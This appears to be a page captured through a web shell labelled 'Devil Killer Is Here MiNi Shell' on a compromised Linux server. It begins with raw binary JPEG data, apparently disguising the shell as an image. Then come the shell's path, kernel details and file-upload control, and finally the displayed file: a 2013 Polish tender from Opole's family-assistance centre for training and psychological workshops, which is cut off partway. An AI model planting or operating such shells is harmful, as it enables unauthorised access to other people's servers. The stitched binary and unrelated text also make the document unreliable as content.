JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130620/119491-N-2013.html

<p class="kh_header"><b>Opole: Organizacja i przeprowadzenie  usług szkoleniowych  i psychologicznych dla 
 klientów  Miejskiego Ośrodka Pomocy Rodzinie w Opolu</b><br>
<b>Numer ogłoszenia: 119491 - 2013; data zamieszczenia: 20.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Opolu , ul. Armii Krajowej 36, 45-071 Opole, woj. opolskie, tel. 077 4005950, faks 077 4005952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie  usług szkoleniowych  i psychologicznych dla 
 klientów  Miejskiego Ośrodka Pomocy Rodzinie w Opolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest organizacja i przeprowadzenie usług szkoleniowych  i psychologicznych dla uczestników PROGRAMU AKTYWIZACJI SPOŁECZNO - ZAWODOWEJ BEZROBOTNYCH ORAZ NIEAKTYWNYCH ZAWODOWO KLIENTÓW MIEJSKIEGO OŚRODKA POMOCY RODZINIE W OPOLU, pn.: MOJA PRACA - MOJA PRZYSZŁOŚĆ realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

Przedmiot zamówienia realizowany będzie w częściach na zadania:

ZADANIE  1
Trening kompetencji i  umiejętności społecznych. 

1. Trening kompetencji i  umiejętności społecznych prowadzony będzie przez psychologa/psychologów  dla 5 grup po ok. 14  osób (łącznie ok 70 osób) przez 5 dni zajęć  dla każdej grupy, po 5 godzin dziennie (łącznie 125 godz. po 45 min).
Zajęcia będą się odbywały w pomieszczeniach  Ośrodka Readaptacji Społecznej SZANSA w Opolu ul. Małopolska 20A, od poniedziałku do piątku w godz. od 8:30 do 16:30,  w świetlicy dostosowanej do przeprowadzania zajęć grupowych.
2. Przy organizacji i realizacji treningu kompetencji i umiejętności społecznych wykonawca winien uwzględnić następujące minimum programowe:
1) Trening asertywności:
- pozytywne myślenie o sobie - zwiększenie pewności siebie i wiary we własne siły,
- wyrażanie swojego zdania, potrzeb i uczuć -  skuteczne realizowanie własnych potrzeb,
- tworzenie lepszych relacji z ludźmi - radzenie sobie z agresją i manipulacją ze strony innych,
- asertywne wyrażanie emocji pozytywnych i negatywnych,
- radzenie sobie z krytyką - postawa asertywna podczas konfliktów.
2) Trening komunikacji:
- nauka podstawowych technik komunikacji, w tym aktywnego słuchania,
- komunikacja niewerbalna,
- skuteczne działanie w konflikcie - indywidualny wybór strategii działania,
- rozwiązywanie konfliktów ,
- czynniki wpływające na efektywną współpracę zespołową.

3) Motywowanie do poznawania i wykorzystania indywidualnego potencjału:
- rozpoznawanie i wykorzystanie własnych systemów odporności, swoich słabych i mocnych stron,
- wyznaczanie i osiąganie celów osobistych,
- budowanie stabilnej samooceny,
- budowanie motywacji
- uwarunkowania procesu decyzyjnego, a podejmowanie trafnych decyzji,
- wychodzenie z błędnego koła wyuczonej bezradności i sposoby obrony przed nią.
3. W ramach realizacji zamówienia Wykonawca zobowiązany będzie do:
1)Zapewnienia osób bezpośrednio uczestniczących w realizacji zamówienia - psychologa/psychologów z odpowiednim wykształceniem, umiejętnościami i doświadczeniem dostosowanym do tematyki treningu.
2) Zapewnienia uczestnikom materiałów  niezbędnych do odbycia treningu. 
3) Zapewnienia uczestnikom treningu jednego ciepłego posiłku ( obiad - drugie danie) oraz serwisu kawowego ( kawa, herbata oraz drożdżówka dla każdego uczestnika + kruche ciasteczka) i zimnych napoi ( woda mineralna + soki owocowe). 
4) Ubezpieczenie NNW wszystkich uczestników kursu i przedstawienie Zamawiającemu potwierdzenia. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł/1 ubezpieczonego.   

4. Termin realizacji usługi:  22.07.2013r.  - 26.08.2013r.

ZADANIE  2
Warsztaty kompetencji rodzicielskich.

1.Przedmiotem zamówienia jest organizacja i przeprowadzenie warsztatów dla rodziców i dzieci poświęconych problemom w relacjach rodzinnych:
-   relacje rodzic - dziecko (komunikacja, dyscyplina, konsekwencja, odpowiedzialność),
-   najczęściej występujące problemy wychowawcze i sposoby radzenia sobie z nimi,
-  wspólne spędzanie czasu wolnego w rodzinie.
   2. W warsztatach  będzie uczestniczyła 1 grupa rodziców w ilości ok. 8 osób dorosłych oraz dzieci w ilości  
   ok. 14 osób,  urodzonych:
    - rok 2012  -  1 dziecko,
    - rok 2011  -  2 dzieci,
    - rok 2010  -  2 dzieci,
    - rok 2009  -  1 dziecko,
    - rok 2008  -  1 dziecko,
    - rok 2007  -  1 dziecko,
    - rok 2005  -  1 dziecko,
    - rok 2004  -  1 dziecko,
    - rok 2001  -  1 dziecko,
    - rok 1999  -  2 dzieci,
    - rok 1998  -  1 dziecko.
Zajęcia będą się odbywały w pomieszczeniach Ośrodka Readaptacji Społecznej SZANSA  w Opolu 
   ul. Małopolska 20A    ( świetlica i 2 pokoje przystosowane do opieki nad dziećmi).
3.Zajęcia w ramach  Warsztatów kompetencji rodzicielskich  będą się odbywały przez 5 dni, 
po 5 godzin (45 min.) dziennie - łącznie 25 godz., w godzinach:  9:00 - 14:00. 
Przez 3 dni zajęcia w ramach warsztatów będą się odbywały oddzielnie dla rodziców i oddzielnie dla dzieci, natomiast przez kolejne 2 dni zajęcia odbywać się będą wspólnie dla rodziców z dziećmi.
4.W ramach realizacji zamówienia Wykonawca zobowiązany będzie do:
1) Zapewnienia osób bezpośrednio uczestniczących w realizacji zamówienia:
   a) trenerów z  odpowiednim wykształceniem (pedagog/psycholog/terapeuta rodzinny/socjolog), 
       umiejętnościami i minimum 1  rocznym doświadczeniem  w prowadzeniu warsztatów
       grupowych   -    minimum 2 osoby,
   b) opiekunów/ animatorów/pedagogów  z przygotowaniem i doświadczeniem w pracy z małymi 
      dziećmi -   dla  młodszych dzieci - min. 2 osoby.
2) Podczas zajęć dla rodziców ( 3 dni)  dzieci winny mieć zapewnioną fachową opiekę (opiekunowie animatorzy),  zajęcia tematyczne i ruchowe    wraz z materiałami i pomocami do realizacji zajęć, wyżywienie oraz materiały i środki higieniczne - pampersy,  nawilżane  chusteczki, itp.
     

  3) Zapewnienia dorosłym  uczestnikom warsztatów materiałów  pomocy dydaktycznych  oraz dzieciom
       i młodzieży zabawek, gier dydaktycznych, materiałów plastycznych oraz odpowiednich pomocy
      dydaktycznych.
4) Zapewnienia cateringu:
a) dla osób dorosłych -  uczestników warsztatów:  jednego ciepłego posiłku ( obiad - drugie danie) oraz serwisu kawowego w przerwie zajęć ( kawa, herbata oraz drożdżówka, ciasteczka) i zimnych napoi ( woda mineralna + soki owocowe),
b) dla dzieci - uczestników warsztatów: śniadanie w postaci kanapek/drożdżówki oraz  ciepły posiłek( obiad-drugie danie)  oraz zimne i ciepłe  napoje + soki owocowe - posiłki winny być dostosowane do wieku dziecka.
5)Ubezpieczenie NNW wszystkich uczestników warsztatów ( dorosłych i dzieci)  i przedstawienie Zamawiającemu potwierdzenia. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł/1 ubezpieczonego.   
5. Termin realizacji usługi: 27 - 31 sierpnia 2013r.

ZADANIE  3
Wyjazdowy trening poprawnej komunikacji rodzinno - społecznej.

1.Przedmiotem zamówienia jest organizacja i przeprowadzenie wyjazdowego treningu komunikacji rodzinno - społecznej, którego celem jest poprawa relacji rodzica z dzieckiem, rozwijanie umiejętności wzajemnej komunikacji oraz kształtowanie właściwych postaw opiekuńczo - wychowawczych.
2.Trening odbędzie się  podczas, zorganizowanego przez Wykonawcę usług, wyjazdu uczestników wraz z 1 opiekunem z MOPR  i prowadzącymi zajęcia trenerami do miejscowości wypoczynkowej położonej w atrakcyjnej turystycznie miejscowości górskiej na terenie województwa opolskiego lub województw przyległych, odległej od miasta Opola nie dalej niż 100 km.
3. W wyjazdowym treningu  będzie uczestniczyła 1 grupa rodziców w ilości ok. 12 osób oraz 1 grupa dzieci w ilości   ok. 18 osób  urodzonych:
 
    - rok 2012  -  1 dziecko,
    - rok 2011  -  2 dzieci,
    - rok 2010  -  2 dzieci,
    - rok 2009  -  2 dzieci,
    - rok 2008  -  1 dziecko,
    - rok 2006  -  2 dzieci,    
    - rok 2005  -  1 dziecko,
    - rok 2004  -  3 dzieci,
    - rok 2002  -  1 dziecko,
    - rok 2001  -  2 dzieci,
    - rok 1999  -  1 dziecko.
 
   4. W zajęciach grupowych w ramach treningu uczestniczyć będzie 1 grupa rodziców - ok. 12 osób oraz 1 grupa starszych dzieci - ok. 8 osób ( urodzonych w latach:  1999 - 2005).
5.Zajęcia w ramach  treningu będą się odbywały przez 3 dni (piątek-sobota-niedziela)  po  6 - 10 godzin 
(po 45 min.) zajęć grupowych i po 2 godz.(45min.) indywidualnych konsultacji:
1)	Dzień pierwszy (piątek):  
- do obiadu 2 godz. warsztatów dla rodziców  oraz 2 godz. warsztatów dla starszych dzieci, 
- po obiedzie 2 godz. warsztatów dla rodziców  oraz 2 godz. warsztatów dla starszych  dzieci,
- przed kolacją 2 godz. wspólnych warsztatów dla rodziców i wszystkich dzieci ( wykorzystanie
  nabytej wiedzy   w praktyce -  gry i zabawy edukacyjne, działania relaksacyjne - naturalne sposoby 
  budowania   dobrego samopoczucia), 
- po kolacji- 2 godz.  indywidualne  konsultacje dla rodziców i dzieci .
2)	Dzień drugi (sobota):  
- po śniadaniu 4  godz. warsztatów dla rodziców  oraz 4 godz. warsztatów dla starszych dzieci, 
- po obiedzie 2 godz. wspólnych warsztatów dla rodziców i wszystkich dzieci ( wykorzystanie nabytej 
  wiedzy  w  praktyce -  gry i zabawy edukacyjne, działania relaksacyjne - naturalne sposoby budowania 
  dobrego samopoczucia),
- przed kolacją - piesza wycieczka, zwiedzanie najbliższej okolicy, 
- po kolacji- 2 godz.  indywidualne  konsultacje dla rodziców i dzieci .
3)	Dzień trzeci (niedziela):  
- po śniadaniu 2  godz.  warsztatów dla rodziców  oraz 2 godz. warsztatów dla starszych dzieci 
  oraz 2 godz. wspólnych warsztatów dla rodziców i wszystkich dzieci ( wykorzystanie nabytej wiedzy 
w  praktyce -  gry i zabawy edukacyjne, działania relaksacyjne - naturalne sposoby budowania dobrego
  samopoczucia),
- po obiedzie- wspólny spacer po najbliższej okolicy - wyjazd. 

6.Podczas zajęć grupowych dla rodziców i starszych dzieci, małe dzieci - ok. 10 osób ( urodzone w latach: 2006- 2012) winny mieć zapewnioną fachową opiekę przez min. 2 opiekunów - animatorów,  zajęcia tematyczne, ruchowe i plastyczne wraz z materiałami i pomocami do realizacji zajęć oraz materiały i środki higieniczne - pampersy,  nawilżane  chusteczki, itp.
.
   7. Podczas wyjazdowego treningu komunikacji rodzinno - społecznej Wykonawca  usług winien zapewnić:
1) Osoby bezpośrednio uczestniczących w realizacji zamówienia:
   a) trenerów z  odpowiednim wykształceniem (pedagog/psycholog/terapeuta rodzinny/trener), 
       umiejętnościami i doświadczeniem dostosowanym do tematyki zajęć-  dla osób dorosłych -
      min. 2 osoby,
   b) opiekunów/ animatorów/pedagogów  z przygotowaniem i doświadczeniem w pracy z małymi 
      dziećmi -   dla  młodszych dzieci - min. 2 osoby.
      2) Materiały  pomoce dydaktyczne dla osób dorosłych  oraz dla dzieci  młodzieży zabawek, gier 
          dydaktycznych, materiałów plastycznych oraz  materiały i środki higieniczne - pampersy,  nawilżane 
          chusteczki, itp.
      3) Dojazd i powrót uczestników treningu  i opiekuna,
4)Ubezpieczenie NW uczestników treningu i opiekuna na czas trwania wyjazdu.
  Suma ubezpieczenia nie mniejsza niż 10.000,00 zł/1 ubezpieczonego.   
5) Zakwaterowanie przez 3 dni:  wszyscy uczestnicy  treningu oraz  opiekun będą zakwaterowani w domu wczasowym, pensjonacie, itp - w jednym budynku, w pokojach z pełnym węzłem sanitarnym:
- 4 pokoje - 2 osobowe
- 2 pokoje - 3 osobowe
- 4 pokoi - 4 osobowych
- 1 pokój  - 1 osobowy ( dla opiekuna). 
 Baza noclegowa powinna mieć zaplecze rekreacyjne. 
 W budynku lub w pobliżu budynku powinny znajdować się sale wykładowe  umożliwiające 
  przeprowadzenie zajęć grupowych.
6) Wyżywienie dla uczestników i  opiekuna  przez 3 dni: 
- w dniu przyjazdu: obiad + kolacja oraz serwis kawowy - kawa, herbata i słodka przekąska (kruche ciasteczka lub drożdżówka), poczęstunek dla dzieci ( soki, ciasteczka, drożdżówki), 
- w drugim dniu pobytu:  śniadanie + obiad + kolacja oraz serwis kawowy - kawa, herbata i słodka przekąska (kruche ciasteczka lub drożdżówka), poczęstunek dla dzieci ( soki, ciasteczka, drożdżówki), 
- w dniu wyjazdu: śniadanie + obiad oraz serwis kawowy - kawa, herbata i słodka przekąska (kruche ciasteczka lub drożdżówka), poczęstunek dla dzieci ( soki, ciasteczka, drożdżówki). 
7)  opiekę medyczną doraźną - w razie potrzeby możliwość wizyty lekarskiej oraz odpowiednio
        wyposażoną  w środki opatrunkowe apteczkę pierwszej pomocy.

  Przy kalkulacji kosztów wyjazdowego treningu komunikacji rodzinno - społecznej Wykonawca 
  powinien uwzględnić koszty wyjazdu i pobytu trenerów/opiekunów (min 4 osoby)  prowadzących zajęcia.

8. Termin realizacji usługi: w okresie 16 - 18  sierpnia 2013r.  lub 23 - 25 sierpnia 2013r.


ZADANIE  4
Kurs komputerowy.

1. Kurs komputerowy prowadzony będzie dla 1 grupy - ok 20 uczestników projektu  w ilości 80 godzin dydaktycznych  (45 min.), po 8 godz. dydaktycznych  dziennie,  w godzinach: 8:30 - 15:00. 
2. Przy organizacji kursu komputerowego  wykonawca winien uwzględnić następujące minimum programowe:
1)	Budowa i obsługa komputera, wprowadzenie do systemu operacyjnego Windows.
2)	Poruszanie się po systemie Windows.
3)	Obsługa edytora tekstu.
4)	Ustawianie parametrów wydruku, drukowanie dokumentów.
5)	Obsługa arkusza kalkulacyjnego
6)	Internet: strony internetowe, poczta elektroniczna, komunikatory.
3. W ramach realizacji zamówienia Wykonawca zobowiązany będzie do:
1) Zapewnienia osób bezpośrednio uczestniczących w realizacji zamówienia  z odpowiednim
wykształceniem, umiejętnościami i doświadczeniem dostosowanym do tematyki kursu-    szkolenia.
2) Zapewnienia sali/sal dydaktycznych na terenie miasta Opola wyposażonych w niezbędny sprzęt komputerowy, spełniający wymogi BHP, w ilości odpowiadającej liczbie uczestników i stanie technicznym i oprogramowaniem gwarantującym odpowiedni poziom kursu.
3) Zapewnienia uczestnikom materiałów szkoleniowych i pomocy dydaktycznych. 
       4) Zapewnienia każdemu uczestnikowi kursu/warsztatów/treningu cateringu w postaci:
a)  śniadania: kanapka - bułka podłużna lub tradycyjna z serem lub wędliną, pastą z dodatkiem    warzyw, herbata ( urozmaicone),
b) serwisu kawowego podczas przerwy w zajęciach: kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
             c)ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
       surówka, sosy -  w pojemnikach  jednorazowych ( urozmaicone ).
5) Ubezpieczenie NNW wszystkich uczestników kursu i przedstawienie Zamawiającemu potwierdzenia. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł/1 ubezpieczonego.   

4. Termin realizacji usług:  szkolenie powinno być zorganizowane w terminie: 02 - 27 września 2013r.


ZADANIE   5
Kurs samoobrony i asertywności

1. Celem kursu jest wzmocnienie pewności siebie, nabycie umiejętności wczesnego rozpoznawania zagrożenia i unikania go. Zaskoczenia napastnika niestandardową reakcją, a także bezpośrednie wyrażanie własnego zdania, emocji i postaw w granicach nienarażających praw innych osób oraz własnych.  
Zajęcia powinny zawierać elementy z prawa cywilnego, karnego oraz techniki samoobrony, techniki interwencyjne  oraz techniki asertywności. 
2. Kurs samoobrony i asertywności prowadzony będzie dla ok. 40 osób ( ok. 10 mężczyzn i ok. 30 kobiet)  - 2 grupy po ok. 20 osób w ilości 20 godz. ( 45min.) zajęć dla każdej grupy ( łącznie 40 godzin szkoleniowych).
Zajęcia dla każdej grupy będą się odbywały 2 razy w tygodniu po 2 godz. szkoleniowe w godzinach: 17:00 - 20:00. 
3. W ramach realizacji zamówienia Wykonawca zobowiązany będzie do:
1) Zapewnienia osób bezpośrednio uczestniczących w realizacji zamówienia  z odpowiednim
przygotowaniem, wykształceniem, umiejętnościami i doświadczeniem dostosowanym do tematyki kursu. 
2) Zapewnienia sali/sal na terenie miasta Opola wyposażonych w szatnię, zaplecze sanitarne i niezbędny sprzęt spełniający wymogi BHP, w ilości odpowiadającej liczbie uczestników i stanie technicznym gwarantującym odpowiedni poziom kursu.
3)  Zapewnienia uczestnikom materiałów szkoleniowych i pomocy dydaktycznych. 
5) Ubezpieczenie NNW wszystkich uczestników kursu i przedstawienie Zamawiającemu potwierdzenia. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł/1 ubezpieczonego.   

4. Termin realizacji usług:  szkolenie powinno być przeprowadzone w terminie: 
                                                od 02 sierpnia  do 27 września 2013r.


Z uwagi na możliwość rezygnacji uczestnika projektu lub z przyczyn losowych, Zamawiający w każdym zadaniu,  zastrzega sobie możliwość zmiany ilości uczestników.
Lista  uczestników każdego zadania będzie przekazana Wykonawcy na 5 dni przed terminem rozpoczęcia realizacji danego zadania. 







II. W ramach realizacji wszystkich części (zadań) zamówienia Wykonawca zobowiązany będzie do:

1. Opracowania szczegółowego programu i harmonogramu zajęć.
Szczegółowe programy i harmonogramy zajęć winny być dostarczone Zamawiającemu do zatwierdzenia do 5 dni od terminu podpisania umowy.
2. Prowadzenia dokumentacji: listy obecności, dzienniki zajęć lista odbioru materiałów szkoleniowych i listy dostarczonych posiłków (jeżeli  zadanie przewiduje catering) - na każdy dzień, i dostarczeniu jej Zamawiającemu.
3. Przeprowadzenia i opracowania ankiet oceny kursu/warsztatów/treningu i prowadzących zajęcia oraz efektywności zajęć.
4. Bieżącego informowania Zamawiającego o nieusprawiedliwionej nieobecności na zajęciach grupowych. 
5. Wydawania zaświadczeń o ukończeniu kursu/warsztatów/treningu i dostarczenie kopii zaświadczeń Zamawiającemu. 
6.Przedstawienia Zamawiającemu potwierdzenia ubezpieczenia NNW uczestników kursu/warsztatów/treningu na 5 dni przed rozpoczęciem zajęć.
7. Dostarczenia pisemnego sprawozdania z przeprowadzonego kursu/warsztatów/treningu zawierającego informację o obecnościach na zajęciach, ankietach, rezygnacji z zajęć i uzyskanych efektach. Sprawozdanie winno być zaakceptowane przez Zamawiającego.
8. Realizacji przedmiotu umowy z należytą starannością oraz czuwania nad prawidłową realizacją umowy.
9. Promocji usługi w ramach projektu  PROGRAM AKTYWIZACJI SPOŁECZNO ZAWODOWEJ BEZROBOTNYCH ORAZ  NIEAKTYWNYCH ZAWODOWO KLIENTÓW MIEJSKIEGO OŚRODKA POMOCY RODZINIE W OPOLU pn.  MOJA PRACA -  MOJA PRZYSZŁOŚĆ. Promocja obejmować będzie min.: umieszczanie obowiązujących logotypów   na zaświadczeniach o ukończeniu  kursu/warsztatów/treningu oraz innych dokumentach, zgodnie z Wytycznymi  dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki    ( wytyczne  dostępne są na stronie www.efs.gov.pl) łącznie z podpisem: Projekt współfinansowany ze środków   Unii Europejskiej w  ramach Europejskiego Funduszu Społecznego,   a także oznaczanie pomieszczeń, w których będą odbywały się zajęcia  poprzez umieszczenie informacji o współfinansowaniu w sali zajęć, w miejscu widocznym dla uczestników zajęć lub przed wejściem do sali..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.12.12.70-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie:

Zadania 1 - co najmniej dwa  grupowe  treningi  kompetencji/rozwoju osobistego/umiejętności interpersonalnych/ umiejętności społecznych dla  co najmniej 8 osób każdy.
Zadania 2 i  Zadania 3 
- co najmniej dwa grupowe szkolenia/warsztaty/treningi  z zakresu  tematyki opiekuńczo - wychowawczej/     kompetencji rodzicielskich/relacji rodzic-dziecko/problemów rodzinnych dla co  najmniej   8  osób każdy.	
Zadania 4 - co najmniej dwa kursy z zakresu obsługi komputera  dla co najmniej 10 osób  każdy.
Zadania 5 - co najmniej dwa kursy z zakresu samoobrony dla a co najmniej 10 osób każdy. 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust.2b Prawa zamówień publicznych).       

Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.
W celu potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia do wykonania zamówienia Zamawiający żąda złożenia oświadczenia w formie wykazu usług wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem do wykazu dokumentów potwierdzających ich należyte wykonanie.

Dla Zadania 1: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże co najmniej dwa    grupowe  treningi  kompetencji/rozwoju osobistego/umiejętności interpersonalnych/ umiejętności społecznych dla  co najmniej 8 osób każdy.
Dla Zadania 2 i Zadania 3: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże 
co najmniej dwa grupowe szkolenia/warsztaty/treningi  z zakresu  tematyki opiekuńczo - wychowawczej/     kompetencji rodzicielskich/relacji rodzic-dziecko/problemów rodzinnych  dla co  najmniej   8  osób każdy.
Dla Zadania 4: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże co najmniej dwa kursy z zakresu obsługi komputera  dla co najmniej 10 osób  każdy .
